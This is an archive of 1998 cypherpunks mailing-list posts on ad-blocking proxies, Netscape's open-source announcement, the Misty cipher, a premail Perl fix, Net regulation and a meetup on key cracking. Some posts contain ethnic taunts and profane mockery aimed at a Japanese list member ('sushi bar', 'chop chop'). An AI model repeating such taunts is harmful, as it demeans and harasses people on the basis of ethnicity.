   |       The most powerful passion in life is not love or hate,       |
   |       but the desire to edit somebody elses words.                 |
   |                                                                    |
   |                                  Sign in Ed Barsis' office         |
   |                                                                    | 
   |            _____                             The Armadillo Group   |
   |         ,::////;::-.                           Austin, Tx. USA     |
   |        /:'///// ``::>/|/                     http://www.ssz.com/   |
   |      .',  ||||    `/( e\                                           |
   |  -====~~mm-'`-```-mm --'-                         Jim Choate       |
   |                                                 ravage@ssz.com     |
   |                                                  512-451-7087      |
   |____________________________________________________________________|





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Threatt <bradt@ehq.com>
Date: Fri, 23 Jan 1998 07:29:00 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Why no "Banner Ad Eaters"?
In-Reply-To: <34c704c2.971366@128.2.84.191>
Message-ID: <34C7D3EF.632F@ehq.com>
MIME-Version: 1.0
Content-Type: text/plain



Tim May wrote:
> 
> At 8:21 AM -0800 1/22/98, bill.stewart@pobox.com wrote:
> 
> >What I'd really like to see in a browser is an option to
> >turn off animated GIFs (other than by killing all images.)
> Yeah, I'm surprised that "banner ad eaters" have not been widely 
> deployed. (If they're available, I haven't about them.) 
> Something to remove the annoying banners, or stop them from 
> wasting valuable time loading in the first place.
There are several examples people have mentioned here:
Roxen, junkbuster, etc.

I happen to use one called WebFilter, a patched CERN httpd
(http://math-www.uni-paderborn.de/~axel/NoShit) which allows
program filtering based on URL regexp matching.

Of course, now that Netscape's releasing their source code, what
would *really* help the practice take off would be integration of 
one of these systems into Netscape. 

On the downside, this is sure to trigger an ad Arms Race, with content
providers melding together content and ads.  Right now, I can view the
web with almost no ads, but if a million people are filtering ads off a
site, you can bet there will be countermeasures, and lots of them.  It's
difficult to imagine the filters winning, without more advanced support
(for example, cropping images to remove ads, and collaborative filtering
pools).  But if a million people are using the system, and 0.01% are
coders committed to making it work, well, you can do a lot with 100
brains.

> BTW, some of the notorious features of the new "anti-hacking" laws
> make  disassembly of programs, like browsers, illegal. While they 
> won't bother with folks who just fool around with disassembling 
> code, they might use these anti-hacking laws to throw the book at 
> anyone who made such a banner-eater available.
Proxies can do the same thing, and just as well, IMO, and it doesn't
require any ugly binary patching. 

-MT





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Fri, 23 Jan 1998 04:46:10 +0800
To: Steve Schear <schear@lvdi.net>
Subject: Re: Intel introduces new compression technology for surfers   [CNN]
In-Reply-To: <v03102807b0ec38d520be@[208.129.55.202]>
Message-ID: <Pine.GSO.3.95.980122153025.24995Y-100000@king>
MIME-Version: 1.0
Content-Type: text/plain



> Maybe they dynamically turn off the modem compression feature at both ends during an image download.  LZW-like compression actually adds overhead to files which are non-text based.

But any modern modem has v.42bis, and with v.42bis it automatically shuts
off the compression anyway!   (Maybe that was just v.42, I forget, but it
doesn't have the problems that MNP5 has with compressed files)  

Either way, this feature already exists....

Ryan Anderson - Alpha Geek
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Fri, 23 Jan 1998 04:51:30 +0800
To: Nobuki Nakatuji <bd1011@hotmail.com>
Subject: Re: Ultra computer
In-Reply-To: <19980122011204.22624.qmail@hotmail.com>
Message-ID: <Pine.GSO.3.95.980122153345.24995Z-100000@king>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 21 Jan 1998, Nobuki Nakatuji wrote:

> Ultra computer which NEC had the calculation speed of the world
> maximum of about 1000 times of the super computer to was decided
> to be developed. 
> Ultra computer will be completed in 2001. 
> It has the performance that the calculation which takes 10000 years
> with the personal computer is made of 3, 4 days. 

For reference, my head hurts after trying to read this.

Can you provide any sources for this information?  I would prefer a url,
but a book or magazine would be fine.

Is this supposed to compete with Intels 9000 processor Pentium Pro
cluster?

Ryan Anderson - Alpha Geek
PGP fp: 7E 8E C6 54 96 AC D9 57  E4 F8 AE 9C 10 7E 78 C9
print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<>
)]}\EsMsKsN0[lN*1lK[d2%Sa2/d0<X+d*lMLa^*lN%0]dsXx++lMlN/dsM0<J]dsJxp"|dc`





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ryan Anderson <ryan@michonline.com>
Date: Fri, 23 Jan 1998 05:02:04 +0800
To: "William H. Geiger III" <whgiii@invweb.net>
Subject: Re: Misty???
In-Reply-To: <199801220815.DAA29824@users.invweb.net>
Message-ID: <Pine.GSO.3.95.980122154534.24995a-100000@king>
MIME-Version: 1.0
Content-Type: text/plain



> Someone on the OpenPGP list was asking for an asignment for an algorithm
> id in the OpenPGP RFC for Misty1 (from Japan whoda thought <g>). I made my
> post about snake-oil and got chastised by hal@pgp.com as he seems to think
> it's a respectable algorithm:

Well, he said that he wasn't aware of any serious cryptanalysis,
specifically on this list.  In all honesty, that's a fully truthful
statement.  Tim May has conveniently confirmed that there *has* been some
real cryptanalysis on it, confirming that it's not a good algorithm, but
it's not snake-oil.  (If it get's submitted for peer review, can you
really call it that?)

I'm going to wager that all Hal was saying is that he had seen no evidence
to that effect, and that you had presentted none.

> 
> >>Misty is described in the proceedings of the most recent annual
> >>conference on fast encryption algorithms.  It is designed to be provably
> >>resistant to linear and differential cryptanalysis.  As a new set of
> >>algorithms (a few variants exist under the "Misty" label), it is one of
> >>many where a "wait and see" attitude is appropriate to see how it holds
> >>up.  As a patented algorithm, it may have trouble competing with
> >>alternatives that are free of restrictions.
> >>
> >>However your charge that it is "snake-oil" seems unfounded.  It appears
> >>to be a respectable academic development effort, within the mainstream
> >>of cryptographic research, and has some reasonable-looking theory behind
> >>it. As far as I know there has been no cryptanalysis or technical
> >>commentary of any sort regarding Misty on the cypherpunks mailing list.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Shostack <adam@homeport.org>
Date: Fri, 23 Jan 1998 05:00:30 +0800
To: cypherpunks@cyberpass.net (Cypherpunks Mailing List)
Subject: Re: Misty??? (fwd)
Message-ID: <199801222053.PAA12335@homeport.org>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous wrote:
|Adam Back wrote:

Well, for the record, that was me, not Mr. Back, but who can tell the
difference?

|> Tim May wrote:
|> | I wouldn't call Misty "snake oil." But it's also been thoroughly taken
|> | apart and shown to be weak. Importantly, it was submitted by Mitsubishi for
|> | peer review.
|> 
|> Could you provide a pointer to the analysis paper?
|
|Adam, you should know better than to ask.  Everyone knows you can't
|trust a bigot to do cryptography.  Tim "Chop Chop" May's opinions about
|Misty are based not on the strength of the cipher, but on the ethnicity
|of the creator.

	Its clear to me that Nobuki baits Tim, and Tim baits Nobuki.
Its not as entertaining as the Detwieler days (where we would have
gotten the claimn that Tim and Nobuki were the same), but hey..

	I'm perfectly happy to let bigots do my cryptanalysis for me.
As long as they get positive results, hey, I'm more secure.  Not
believing that the Americans could break German engineering was one of
the failures of the Enigma team.

Adam

-- 
"It is seldom that liberty of any kind is lost all at once."
					               -Hume










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jrbl Pookah <lists@castle5.castlec.com>
Date: Fri, 23 Jan 1998 05:18:48 +0800
To: cypherpunks@Algebra.COM
Subject: Communicator 5.0 to be GPL'ed
Message-ID: <Pine.LNX.3.95.980122162759.1314A-100000@castle5.castlec.com>
MIME-Version: 1.0
Content-Type: text/plain




	Here's something I came across on one of my other lists.  I looked
at the URL, and it looked good.  Anybody able to confirm/deny?  And what
kind of implications do y'all think this'll have for Netscape's security?

	(What if improved security code comes to Netscape from bodies
/outside/ the US?)


---------- Forwarded message ----------
Date: Thu, 22 Jan 1998 10:33:21 -0800 (PST)
From: <snip...snip>
Subject: Communicator 5.0 to be GPL'ed


Yes its true !!
http://biz.yahoo.com/prnews/980122/ca_netscap_3.html

woo hoo!!

Dex-

----End Forwarded Message---

--
Joseph Blaylock		Castle Computers, Inc.		JOAT,MODF
blaylock@castlec.com	   (513)469-0888	           YMMV
--
"Everything is perfect, but there is a lot
of room for improvement."			---Shunryu Suzuki






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@sundernet.com>
Date: Fri, 23 Jan 1998 05:40:48 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Why no "Banner Ad Eaters"?
In-Reply-To: <v03102800b0ed615868a4@[207.167.93.63]>
Message-ID: <Pine.SUN.3.96.980122163911.2423P-100000@beast.brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 22 Jan 1998, Tim May wrote:

> BTW, some of the notorious features of the new "anti-hacking" laws make
> disassembly of programs, like browsers, illegal. While they won't bother
> with folks who just fool around with disassembling code, they might use
> these anti-hacking laws to throw the book at anyone who made such a
> banner-eater available.

Fuck that, Netscape is soon to be GPL'd.

> After all, directly infringing on the rights of advertisers to beam their
> shit into our eyeballs is America's most serious crime.

Probably considered more serious than murder by them.

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Blair <jdblair@frodo.tucc.uab.edu>
Date: Fri, 23 Jan 1998 06:55:26 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Why no "Banner Ad Eaters"?
In-Reply-To: <v03102800b0ed615868a4@[207.167.93.63]>
Message-ID: <199801222241.QAA04237@frodo.tucc.uab.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----



tcmay@got.net said:
> Yeah, I'm surprised that "banner ad eaters" have not been widely
> deployed. (If they're available, I haven't about them.) Something to
> remove the annoying banners, or stop them from wasting valuable time
> loading in the first place.

Netscape just announced that they're going to release the source code 
to Communicator 5.0 with a license that allows modification and 
redistribution "in the heritage of the GNU Public License."  No 
details on the specific license yet, but it sounds *very* hopeful.

The point is... we *will* be able to add all the funky new features 
we want.  Complaining about the browser will no longer be acceptable 
now that we will be able to *do* something about it.  It also means 
that Microsoft will get to compete head-to-head with a real free 
software model.  This is an excellent opportunity to demonstrate what 
the free software model can do.  I can already envision non-Netscape 
"distributions," custom browser modifications for big customers, etc.

More info here:
http://biz.yahoo.com/prnews/980122/ca_netscap_3.html
http://www.yahoo.com/headlines/980122/business/stories/netscape_1.html
http://www.infoworld.com/cgi-bin/displayStory.pl?980122.ehnetcode.htm


 -john.




......................................................................
.                                                                    .
.....John.D.Blair...   mailto:jdblair@uab.edu   phoneto:205.975.7123 .
                   .   http://frodo.tucc.uab.edu  faxto:205.975.7129 .
 ..sys|net.admin....                                                 .
 .                     the university computer center            .....
 ..... g.e.e.k.n.i.k...the.university.of.alabama.at.birmingham....




-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBNMfLCwJjTpK3AXhBAQHDMQP+LaUVmDpm2Rv8EPVCkd1o389OrOKi/3EY
MKmlHaeruFKhAf1tCcY78C8I6Ofm0jbZJ9s1sHOWprqjAbi4l+C53GlQoGNCuD6R
x9Zm3fflfRbMF0slUqNUcAxVMPF8Qjh5YC2f6iOchIq0GgxnO8B53r5cUwri5Ne9
pYaq2/HpAow=
=eG/n
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Stutz <stutz@dsl.org>
Date: Fri, 23 Jan 1998 05:56:22 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Why no "Banner Ad Eaters"?
In-Reply-To: <v03102800b0ed615868a4@[207.167.93.63]>
Message-ID: <Pine.LNX.3.95.980122164519.10685p-100000@nacs.net>
MIME-Version: 1.0
Content-Type: text/plain



On Thu, 22 Jan 1998, Tim May wrote:

> Yeah, I'm surprised that "banner ad eaters" have not been widely deployed.
<snip>
> Whether through a plug-in, or through a "patched" version of Navigator or
> Explorere. 

I suspect that new versions of Navigator will have these features plus much
more: <http://www.wired.com/news/news/technology/story/9813.html>





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Burnes <jim.burnes@ssds.com>
Date: Fri, 23 Jan 1998 08:02:46 +0800
To: cypherpunks@toad.com
Subject: Premail/PERL 5.004 fix
Message-ID: <34C7DCF4.CFB97BFA@ssds.com>
MIME-Version: 1.0
Content-Type: text/plain



Punks:

I've needed to upgrade PERL recently to 5.004 because
some new software wouldn't work without it.  I didn't
want to do it because I heard it would break premail.

I decided to DL the old perl-5.003 RPM from sunsite
just in case 5.004 really screwed premail up.  The
actual truth of the matter is that 5.004 just warns
you that premail re-declares several variable.  Apparently
this has no effect on the program, but those warnings
are pretty annoying.  Here is now you fix it:

Define a WARN trap that checks a variable (DOWARN)
to see whether it should warn or not.  Since the
re-declarations occurr in three different places
you just have to set DOWARN to 0 before the line
and then DOWARN to 1 after the line.  Crude, but
effective.  Most of this code can be found by
doing a man page on 'perlfunc', but I thought I'd
save someone the time.

Here is the diff for premail version .449.

100a101,102
> BEGIN { $SIG{'__WARN__'} = sub { warn $_[0] if $DOWARN } }
> $DOWARN = 0;
1274a1277
>     $DOWARN = 0;
1275a1279
>     $DOWARN = 1;
1356a1361
>     $DOWARN = 0;
1357a1363
>     $DOWARN = 1;
6319a6326
>     $DOWARN = 0;
6320a6328
>     $DOWARN  = 1;

Your milelage may vary...

Jim Burnes
jim.burnes@ssds.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: <bubbabill@whitehouse.gov>
Date: Fri, 23 Jan 1998 07:29:17 +0800
To: <cypherpunks@cyberpass.net>
Subject: State of the Union Address
Message-ID: <199801222322.RAA24666@pc1824.ibpinc.com>
MIME-Version: 1.0
Content-Type: text/plain



Hear that the State of the Union next Monday has a section on Internet -
networks - critical infrastructure protection et al. Anyone have any
details?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 23 Jan 1998 12:39:51 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Gore Commission wants to regulate the Net like broadcast
In-Reply-To: <v03102800b0ec84e6fcb8@[208.129.55.202]>
Message-ID: <3.0.5.32.19980122173404.0083e100@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



>>These attempts at regulation show just how terrified they are of true free
>>speech and every man a publisher.
>
>Yes, they need "choke points" to control the anarchy.
>
>As with the British plan to license a series of "certificate authorities,"
>or U.S. plans/wishes to do the same thing, this effectively forces all
>citizen-units to sign up with one of the authorized certificate issuers.
>(This is why certificate-based systems are so heinous.)

It's not just the government - the mass media have been scared of the
Net for a long time because it disintermediates them.  
The recent flap about the Drudge Report and the lack of fact-checking 
and quality is a good example of that - the spin has been very negative 
about the dangers of uncontrolled, uncensored, unthrottled speech.
An alternative spin could be to emphasize signal-to-noise and the
far better quality of information that traditional media can provide.

While I've got some disagreements about James Donald's explanations of
Crypto Kong's model (no need for CAs, etc. vs. the simple approaches
for replicating the Web Of Trust and CAs using his tools),
once nice thing about it is that you don't use anything called a 
"certificate" - it just compares whether a message is signed by the
same key that a previous message was.  That previous message can be
a vanilla message, or an introductory note from someone (Alice saying
that Bob's key is 457HLJCR8YFDG7807FG7FD87G, and that this is the
Bob she met at the Peace Center fundraiser), or a note from Catbert
the HR Director saying Bob works at MegaFooBar, or a note from
BankFoo that the checks from account 23123124 need to be signed by
key 93243248329048.  While they work like key signatures, they don't
look like CA signatures, they look like ordinary correspondence.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Fri, 23 Jan 1998 12:43:21 +0800
To: John Young <cypherpunks@toad.com
Subject: Re: CP Bust or Buyout?
In-Reply-To: <1.5.4.32.19980121172436.01503010@pop.pipeline.com>
Message-ID: <3.0.5.32.19980122175410.0083dbf0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:24 PM 1/21/98 -0500, John Young wrote:
>Not much from the West Coast since the C2-CP meet on
>Saturday. Were they all busted, or fragged, or has the 
>underground mole hole at last been taken?
>
>What, C2 shanghai-ed them all, with irrefusable bucks 
>galore to securely distribute porn, NDA$ accomplishing 
>what TLAs couldn't.

Well, we got there and there was a note on the door
saying we had to "sign in credibly" and not freak the guards,
so some people signed in credibly and some signed incredibly.
Sameer did take down the Police Line Do Not Cross tape
and let us get at the sodas; perhaps that bribed some people :-)
We had a reasonably good crowd, and a bunch of out-of-towners
got to talk about what they were doing and work in progress.

Peter Trei did a nice rehash of his talk on the state of key cracking,
somewhat more technical than the layperson version he'd done
at the RSA show.   It keeps getting easier; 40 bits is laughable,
56 is work, but very crackable, even for RC5, and 64 bits will
take years at the current rate - he and some others would rather
see the next big distributed cracks going for RSA 512-bit keys.
Hardware has been advancing a good bit as well as distributed efforts.
The social dynamics of distributed cracking are much different than
expected - the feeling of community that teams have appears to be
more of a motivator than the prize for most people, so coordinated
efforts have been the big contributors.

The talk on export control was put off until another meeting, 
though Greg Broiles gave a nice short summary 
of what's going on.  He'd appreciate input on other people's
experience getting products through the export bureaucrats.

Hugh talked about the state of FreeS/WAN Linux IPSEC,
and also about Secure DNS, which he and John Gilmore recently
went through the paperwork of exporting, crypto source and all.

Lucky Green talked about the Smartcard activities - he and his
unindicted co-conspirators discovered that they're the only
group making public smartcard support tools that aren't controlled
by a smartcard vendor.  Check them out on cypherpunks.to.

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Fri, 23 Jan 1998 10:32:42 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Gore Commission wants to regulate the Net like broadcast
In-Reply-To: <v03102800b0ec84e6fcb8@[208.129.55.202]>
Message-ID: <v03102804b0edac0c93e1@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:26 PM -0800 1/21/98, Tim May wrote:
>Which leaves unruly Cypherpunks still running free.
>
>(Which is why I would look for signs that Congress will seek to make ISPs
>responsible for political speech, a la the Chinese actions. Not this year,
>not next, but someday. Except it won't be explicitly a law about political
>speech, it'll be something about dangerous information, safety of the
>children, etc.)

But if rapes or kill just one child...

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Schear <schear@lvdi.net>
Date: Fri, 23 Jan 1998 11:51:27 +0800
To: Ryan Anderson <ryan@michonline.com>
Subject: Re: Intel introduces new compression technology for surfers  [CNN]
In-Reply-To: <v03102807b0ec38d520be@[208.129.55.202]>
Message-ID: <v03102806b0edb1def220@[208.129.55.202]>
MIME-Version: 1.0
Content-Type: text/plain



At 3:31 PM -0500 1/22/98, Ryan Anderson wrote:
>> Maybe they dynamically turn off the modem compression feature at both ends during an image download.  LZW-like compression actually adds overhead to files which are non-text based.
>
>But any modern modem has v.42bis, and with v.42bis it automatically shuts
>off the compression anyway!   (Maybe that was just v.42, I forget, but it
>doesn't have the problems that MNP5 has with compressed files)  
>
>Either way, this feature already exists....

Thanks for straightening this out.  I was thinking of MNP5 and couldn't find my modem's referemce manual to consider v.42/bis.

--Steve






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <anon@anon.efga.org>
Date: Fri, 23 Jan 1998 07:48:49 +0800
To: cypherpunks@ssz.com
Subject: Ultra computer
Message-ID: <1c103cd4daa62b5cabf50f16f87903e1@anon.efga.org>
MIME-Version: 1.0
Content-Type: text/plain



Go back to the sushi bar and read your English book. Chop chop.

>Ultra computer which NEC had the calculation speed of the world
>maximum of about 1000 times of the super computer to was decided
>to be developed.
>Ultra computer will be completed in 2001.
>It has the performance that the calculation which takes 10000 years
>with the personal computer is made of 3, 4 days.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Fri, 23 Jan 1998 02:23:35 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Misty???
Message-ID: <199801221755.SAA04504@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Back wrote:
> Tim May wrote:
> | I wouldn't call Misty "snake oil." But it's also been thoroughly taken
> | apart and shown to be weak. Importantly, it was submitted by Mitsubishi for
> | peer review.
> 
> Could you provide a pointer to the analysis paper?

Adam, you should know better than to ask.  Everyone knows you can't
trust a bigot to do cryptography.  Tim "Chop Chop" May's opinions about
Misty are based not on the strength of the cipher, but on the ethnicity
of the creator.

On Thu, 11 Sep 1997 22:09:15, Tim May wrote:
> At 9:30 PM -0700 9/11/97, Nobuki Nakatuji wrote:
> >Does anybody know MITSUBISHI MISTY algorithm ?
> >If you know it,Please send e-mail to me.
> >
> 
> You want me play Misty for you? You send me $2500, I play Misty.
> 
> Like you do, I take much money, chop chop.
> 
> (Now shut the fuck up and get the hell off our list with your demands for
> money to explain your bullshit one time pad scheme.)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Fri, 23 Jan 1998 09:13:28 +0800
To: Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk>
Subject: Re: Netscape 5 will be GPL'ed
In-Reply-To: <E0xvVff-0003c1-00@heaton.cl.cam.ac.uk>
Message-ID: <199801230126.UAA05518@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <E0xvVff-0003c1-00@heaton.cl.cam.ac.uk>, on 01/22/98 
   at 11:04 PM, Markus Kuhn <Markus.Kuhn@cl.cam.ac.uk> said:

>I wonder how long we have to wait for the day on which
>we can download the latest GPL'ed Windows NT version source code from
>Microsoft's web server ...

What for, the best it would be good for is as an exercise on how not to
write code.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: I don't do Windows, but OS/2 does.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMff149Co1n+aLhhAQETvQQAifWL4p9iEvYGzI8uHPaRhrh9/KU7A800
M/MlYnJxDzfqm8H88Hf1fso8Tybi1r2jJFdfWPXgsjuAYVNsw8JLeYRodhSvpRnq
LE5IIKAiMbn7u9caubdOF4cAZkbonZ6IsJnfouQiWfpX0R2AuhhBvn5mxnnY/wlu
lazyBsd2qeI=
=hQ9R
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 23 Jan 1998 11:14:02 +0800
To: redgod@usa.net
Subject: Re: (eternity) Re: Eternity Services
In-Reply-To: <3.0.32.19980123104820.007ab4c0@iuol.cn.net>
Message-ID: <v03102801b0edba2a46c3@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 6:49 PM -0800 1/22/98, redgod@usa.net wrote:
>FUCK!
>WHO REGISTER ME TO THIS MAILING LIST?
>CAN YOU TELL ME HOW TO REMOVE MYSELF FROM IT?
>I WILL MAD!
>OH GOD! TOO MANY EMAIL!


Ah, yet another articulate subscriber of one of these lists. (This dweeb
doesn't even say whether he's getting Cypherpunks or Eternity list traffic,
as both are on the cc: list.)

You are hereby condemned to receive all the rants of Nobuki-san, Detweiler
tentacles, and Dim Vulis artwork.

--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Fri, 23 Jan 1998 10:29:48 +0800
To: cypherpunks@ssz.com
Subject: toc.htm
Message-ID: <199801230215.UAA11347@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



   
   
FEDERAL GUIDELINES
FOR SEARCHING AND SEIZING COMPUTERS

   
   
TABLE OF CONTENTS


PREFACE 
INTRODUCTION


   I.  KEY TERMS AND CONCEPTS
A.   DEFINITIONS
B.   LIST OF COMPUTER SYSTEM COMPONENTS
C.   DETERMINING THE COMPUTER'S ROLE IN THE OFFENSE


   II.  GENERAL PRINCIPLES
A.   SEARCH WARRANTS
B.   PLAIN VIEW
C.   EXIGENT CIRCUMSTANCES
D.   BORDER SEARCHES
E.   CONSENT SEARCHES
     1.   Scope of the Consent
     2.   Third-Party Consent
          a.   General Rules
          b.   Spouses
          c.   Parents
          d.   Employers
          e.   Networks:  System Administrators
F.   INFORMANTS AND UNDERCOVER AGENTS


  III.  SEIZING HARDWARE
A.   THE INDEPENDENT COMPONENT DOCTRINE
B.   HARDWARE AS CONTRABAND OR FRUITS OF CRIME
     1.   Authority for Seizing Contraband or Fruits of Crime
     2.   Contraband and Fruits of Crime Defined
C.   HARDWARE AS AN INSTRUMENTALITY OF THE OFFENSE
     1.   Authority for Seizing Instrumentalities
     2.   Instrumentalities Defined
D.   HARDWARE AS EVIDENCE OF AN OFFENSE
     1.   Authority for Seizing Evidence
     2.   Evidence Defined
E.   TRANSPORTING HARDWARE FROM THE SCENE


   IV.  SEARCHING FOR AND SEIZING INFORMATION
A.   INTRODUCTION
B.   INFORMATION AS CONTRABAND
C.   INFORMATION AS AN INSTRUMENTALITY
D.   INFORMATION AS EVIDENCE
     1.   Evidence of Identity
     2.   Specific Types of Evidence
          a.   Hard Copy Printouts
          b.   Handwritten Notes
E.   PRIVILEGED AND CONFIDENTIAL INFORMATION
     1.   In General
          a.   Doctors, Lawyers, and Clergy
          b.   Publishers and Authors
     2.   Targets
     3.   Using Special Masters
F.   UNDERSTANDING WHERE THE EVIDENCE MIGHT BE:  STAND-ALONE PCs,
     NETWORKS AND FILE-SERVERS, BACKUPS, ELECTRONIC BULLETIN BOARDS,
     AND ELECTRONIC MAIL
     1.   Stand-Alone PCs
          a.   Input/Output Devices:  Do Monitors, Modems, Printers, and
               Keyboards Ever Need to be Searched?
          b.   Routine Data Backups
     2.   Networked PCs
          a.   Routine Backups
          b.   Disaster Backups
G.   SEARCHING FOR INFORMATION
     1.   Business Records and Other Documents
     2.   Data Created or Maintained by Targets
     3.   Limited Data Searches
     4.   Discovering the Unexpected
          a.   Items Different from the Description in the Warrant
          b.   Encryption
H.   DECIDING WHETHER TO CONDUCT THE SEARCH ON-SITE OR
     TO REMOVE HARDWARE TO ANOTHER LOCATION
     1.   Seizing Computers because of the Volume of Evidence
          a.   Broad Warrant Authorizes Voluminous Seizure of Documents
          b.   Warrant is Narrowly Drawn but Number of Document
               to be Sifted through is Enormous
          c.   Warrant Executed in the Home
          d.   Applying Existing Rules to Computers
     2.   Seizing Computers because of Technical Concerns
          a.   Conducting a Controlled Search to Avoid
               Destroying Data
          b.   Seizing Hardware and Documentation so the
               System Will Operate at the Lab
I.   EXPERT ASSISTANCE
     1.   Introduction
     2.   Finding Experts
          a.   Federal Sources
          b.   Private Experts
               (1)   Professional Computer Organizations
               (2)   Universities
               (3)   Computer and Telecommunications Industry Personnel
               (4)   The Victim
     3.   What the Experts Can Do
          a.   Search Planning and Execution
          b.   Electronic Analysis
          c.   Trial Preparation
          d.   Training for Field Agents


   V.  NETWORKS AND BULLETIN BOARDS
A.   INTRODUCTION
B.   THE PRIVACY PROTECTION ACT, 42 U.S.C.  2000aa
     1.   A Brief History of the Privacy Protection Act
     2.   Work Product Materials
     3.   Documentary Materials
     4.   Computer Searches and the Privacy Protection Act
          a.   The Reasonable Belief Standard
          b.   Similar Form of Public Communication
          c.   Unique Problems:  Unknown Targets and Commingled
             Materials
     5.   Approval of Deputy Assistant Attorney General Required
C.   STORED ELECTRONIC COMMUNICATIONS


   VI.  DRAFTING THE WARRANT
A.   DRAFTING A WARRANT TO SEIZE HARDWARE
B.   DRAFTING A WARRANT TO SEIZE INFORMATION
     1.   Describing the Place to be Searched
          a.   General Rule:  Obtain a Second Warrant
          b.   Handling Multiple Sites within the Same District
          c.   Handling Multiple Sites in Different Districts
          d.   Information at an Unknown Site
          e.   Information/Devices Which Have Been Moved
     2.   Describing the Items to be Seized
     3.   Removing Hardware to Search Off-Site: Ask th
          Magistrate for Explicit Permission.
     4.   Seeking Authority for a No-Knock Warrant
          a.   In General
          b.   In Computer-Related Cases


   VII.  POST-SEARCH PROCEDURES
A.   INTRODUCTION
B.   PROCEDURES FOR PRESERVING EVIDENCE
     1.   Chain of Custody
     2.   Organization
     3.   Keeping Records
